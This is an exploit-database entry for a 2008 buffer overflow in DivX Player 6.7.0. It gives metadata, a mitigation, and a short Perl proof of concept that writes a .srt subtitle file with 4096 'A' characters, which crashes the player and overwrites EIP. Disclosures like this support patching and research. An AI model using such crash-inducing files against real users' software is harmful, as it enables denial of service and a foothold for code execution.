header-logo
Suggest Exploit
vendor:
DivX Player
by:
milw0rm.com
7.5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: DivX Player
Affected Version From: 6.7.2000
Affected Version To: 6.7.2000
Patch Exists: YES
Related CWE: N/A
CPE: divx_player
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

DIVX Player <= 6.7.0 Buffer Overflow PoC ( .SRT )

When parsing a subtitle file with an overly long subtitle DIVX player will deadly crash with eip overwritten. A perl script is used to create a .srt file with a payload of 4096 'A's.

Mitigation:

Upgrade to the latest version of DIVX Player
Source

Exploit-DB raw data:

# DIVX Player <= 6.7.0 Buffer Overflow PoC (  .SRT )
# Bug: When parsing a subtitle file with an overly long subtitle DIVX player will deadly crash  with eip overwritted:
# Replace MOVIE_FILENAME by your movie filename ( .avi )
#
#!/usr/local/bin/perl                                        
my $file="MOVIE_FILENAME.srt";                           
                                                             
my $payload = "A" x 4096;                                    
                                                             
open( $file, ">>$file") or die "Cannot open $file: $!";      
   
print $file "1 \n";
print $file "00:00:01,001 --> 00:00:02,001\n";
print $file $payload;                              
                                                             
close($file);                                                
                                                             
print "$file has been created \n";    

# milw0rm.com [2008-04-15]